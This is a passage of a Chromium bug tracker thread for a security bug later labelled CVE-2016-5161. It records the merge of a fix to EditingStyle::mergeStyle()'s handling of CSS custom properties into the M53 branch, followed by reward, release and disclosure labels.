Comment 23 by awhalley@chromium.org, Aug 10 2016

Labels: Merge-Request-53

Comment 24 by dimu@chromium.org, Aug 10 2016

Labels: -Merge-Request-53 Merge-Approved-53 Hotlist-Merge-Approved
Your change meets the bar and is auto-approved for M53 (branch: 2785)

Comment 25 by gov...@chromium.org, Aug 11 2016

Please merge your change to M53 branch 2785 ASAP (latest before 5:00 PM PT, Friday 08/12) so we can take it in for next week beta. Thank you.

Comment 26 by bugdroid1@chromium.org, Aug 12 2016

Project Member
Labels: -merge-approved-53 merge-merged-2785
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/ed9e60bc6238f29c78a85229e57a07256c4f66e4

commit ed9e60bc6238f29c78a85229e57a07256c4f66e4
Author: Timothy Loh <timloh@chromium.org>
Date: Fri Aug 12 04:33:40 2016

Fix EditingStyle::mergeStyle()'s handling of custom properties

This patch fixes the logic of EditingStyle::mergeStyle() to correctly
handle custom properties. Currently it serializes the CSSValue and then
reparses it, which, aside from being inefficient, doesn't work for
custom properties as the custom property name is lost (since we only
have the enum value CSSPropertyVariable).

BUG= 622420 

Review-Url: https://codereview.chromium.org/2103043004
Cr-Commit-Position: refs/heads/master@{#410614}
(cherry picked from commit aadb63893e4c1358d1e5139aa29552eb190682c8)

Review URL: https://codereview.chromium.org/2245573002 .

Cr-Commit-Position: refs/branch-heads/2785@{#574}
Cr-Branched-From: 68623971be0cfc492a2cb0427d7f478e7b214c24-refs/heads/master@{#403382}

[modify] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/core.gypi
[modify] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/css/StylePropertySet.cpp
[modify] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/editing/EditingStyle.cpp
[modify] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/editing/EditingStyle.h
[add] https://crrev.com/ed9e60bc6238f29c78a85229e57a07256c4f66e4/third_party/WebKit/Source/core/editing/EditingStyleTest.cpp

Comment 27 by awhalley@chromium.org, Aug 24 2016

Labels: reward-topanel

Comment 28 by awhalley@chromium.org, Aug 24 2016

Labels: -reward-topanel reward-ineligible

Comment 29 by awhalley@chromium.org, Aug 26 2016

Labels: Release-0-M53

Comment 30 by awhalley@chromium.org, Sep 14 2016

Labels: CVE-2016-5161

Comment 31 by sheriffbot@chromium.org, Nov 16 2016

Project Member
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 32 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted
